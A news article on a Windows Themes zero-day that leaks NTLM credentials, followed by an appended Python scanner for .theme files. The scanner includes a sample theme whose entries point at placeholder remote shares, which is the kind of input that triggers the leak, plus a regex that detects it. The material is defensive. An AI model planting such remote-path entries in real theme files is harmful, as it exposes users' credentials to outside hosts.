Windows Themes zero-day could have exposed users to credential theft and more


Security experts have recently uncovered a Windows Themes spoofing zero-day vulnerability that allows threat actors to steal NTLM credentials.

Earlier in 2024, Microsoft discovered, and patched, CVE-2024-21320 - a similar vulnerability with a 6.5 severity score (medium). The patch did not address the issue entirely, and could be bypassed, resulting in the discovery of CVE-2024-38030. Microsoft released the fix for this hole in July 2024.

Now, security researchers from Acros Security revealed how, as they were tinkering with the patch for CVE-2024-21320, they found “an additional instance of the very same problem that was still present on all fully updated Windows versions, up to currently the latest Windows 11 24H2.”

Micropatch available

NTLM (NT LAN Manager) is a suite of security protocols used for authentication, integrity, and confidentiality in Windows networks. It is an older protocol, largely replaced by Kerberos in modern systems, but it is still supported for backward compatibility.

The Register reached out to Microsoft regarding this discovery, and was told the OS maker was looking into it: "We're aware of this report and will take action as needed to help keep customers protected," a Microsoft spokesperson told the publication.

In the meantime, 0patch has developed a micropatch that fixes the issue, so those who are worried about the bug and don’t want to wait for Microsoft can install it now.

"Exploitation of this zero-day is identical to the previous ones previously reported by Akamai," Acros said.

The vulnerability can be exploited rather easily, although it does require some user interaction, the researchers explained. "The user must either copy the theme file (e.g., from an email message or chat) to a folder or desktop on their computer, or visit a malicious web site that automatically downloads the file to their Downloads folder. It's not entirely without user interaction,” they told the publication.
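As an added example (not code from the article, Acros Security or 0patch), here is a small scanner that flags .theme files dropped into a folder such as Downloads whose values point at a network location. It assumes, since the article does not detail the mechanism, that the credential leak is triggered by a theme entry referencing a remote path; the sample theme and the hosts in it are constructed placeholders.

```python
import re
from pathlib import Path

# Constructed sample of a .theme file (INI-style). The network paths are
# placeholders, not real hosts. Assumption: a theme entry that points Windows
# at a remote path is what triggers the NTLM leak the article describes.
SAMPLE_THEME = """[Theme]
DisplayName=Quarterly Report
BrandImage=\\\\10.0.0.5\\share\\brand.png

[Control Panel\\Desktop]
Wallpaper=\\\\share.example\\pics\\wall.jpg
TileWallpaper=0

[VisualStyles]
Path=%SystemRoot%\\resources\\themes\\Aero\\Aero.msstyles
"""

# A value is "remote" if it is a UNC path (\\host\share...) or an http(s) URL.
REMOTE_VALUE = re.compile(r"^(\\\\[^\\]+\\|https?://)", re.IGNORECASE)


def find_remote_references(theme_text: str) -> list[tuple[str, str, str]]:
    """Return (section, key, value) for every key whose value points off-host."""
    hits = []
    section = ""
    for raw in theme_text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue                      # blank line or comment
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]          # new INI section
            continue
        key, sep, value = line.partition("=")
        if sep and REMOTE_VALUE.match(value.strip()):
            hits.append((section, key.strip(), value.strip()))
    return hits


def scan_theme_files(folder: Path) -> dict[str, list[tuple[str, str, str]]]:
    """Scan a folder (e.g. Downloads) for .theme files carrying remote references."""
    findings = {}
    for path in folder.rglob("*.theme"):
        hits = find_remote_references(path.read_text(errors="replace"))
        if hits:
            findings[str(path)] = hits
    return findings


if __name__ == "__main__":
    for sec, key, val in find_remote_references(SAMPLE_THEME):
        print(f"[{sec}] {key} -> {val}")
```

A theme whose entries all resolve to local paths produces no findings, so the scanner can run over a download folder without flagging legitimate themes.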


Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.